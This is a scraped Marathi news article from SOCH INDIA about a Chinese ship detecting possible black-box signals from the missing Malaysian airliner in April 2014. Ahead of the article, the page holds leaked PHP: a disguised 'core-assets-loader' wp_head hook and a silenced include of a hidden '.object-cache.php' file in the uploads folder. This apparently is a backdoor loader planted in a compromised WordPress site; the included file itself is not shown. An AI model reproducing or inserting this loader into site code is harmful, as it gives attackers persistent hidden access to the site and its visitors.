add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बेपत्ता विमान : चिनी जहाजाला मिळाले सिग्नल – SOCH INDIA
Menu

दुनिया
बेपत्ता विमान : चिनी जहाजाला मिळाले सिग्नल

nobanner

रविवार ६ एप्रिल २०१४ एक नजर (06-04-2014 : 01:08:36) पर्थ : बेपत्ता मलेशियन विमानाचा शोध घेणार्‍या चिनी गस्ती जहाजावरील ब्लॅकबॉक्सशोधक यंत्रणेने दक्षिण हिंदी महासागरात सिग्नल पकडले असून, गेल्या महिनाभरापासून सुरू असलेल्या शोधमोहिमेच्या दृष्टीने हा एक महत्त्वपूर्ण शोध ठरू शकतो. चीनच्या हेईशुन 0१ या जहाजाने शनिवारी दक्षिण हिंदी महासागरात हे सिग्नल पकडले. या सिग्नलची फ्रिक्वेन्सी ३७.५ किलो हर्टज् एवढी आहे, असे चीनच्या शिन्हुआ या सरकारी वृत्तसंस्थेने म्हटले आहे. हेईशुनवर ब्लॅकबॉक्सशोधक यंत्रणा असून, या यंत्रणेने २४ अंश दक्षिण अक्षांश आणि १00 अंश पूर्व रेखांशावर हे सिग्नल पकडल्याचे शिन्हुआच्या वृत्तात म्हटले आहे. ब्लॅकबॉक्स फ्लाईट रेकॉर्डरच्या बॅटर्‍या ३0 दिवसांपर्यंत कार्यरत राहू शकतात. याचाच अर्थ असा की, येत्या तीन दिवसांत बॅटर्‍या बंद होऊन ब्लॅकबॉक्सपासून मिळणारे सिग्नल बंद होतील. तत्पूर्वी चिनी जहाजाने काही सिग्नल पकडले असल्याचे वृत्त निश्‍चितच दिलासादायक असले तरी हे सिग्नल बेपत्ता मलेशियन विमानाच्या ब्लॅकबॉक्सचेच आहेत किंवा काय हे अद्याप स्पष्ट होऊ शकलेले नाही. (वृत्तसंस्था)मलेशियाचे विमान आठ मार्चपासून बेपत्ता आहे. क्वालालंपूर येथून बीजिंगसाठी उड्डाण घेतल्यानंतर तासाभरातच हे विमान बेपत्ता झाले होते. बेपत्ता विमानांच्या प्रवाशांत पाच भारतीयांचा समावेश आहे. आंतरराष्ट्रीय पथके या विमानाचा कसोशीने शोध घेत आहेत. मात्र, अद्याप त्यांना यश आलेले नाही.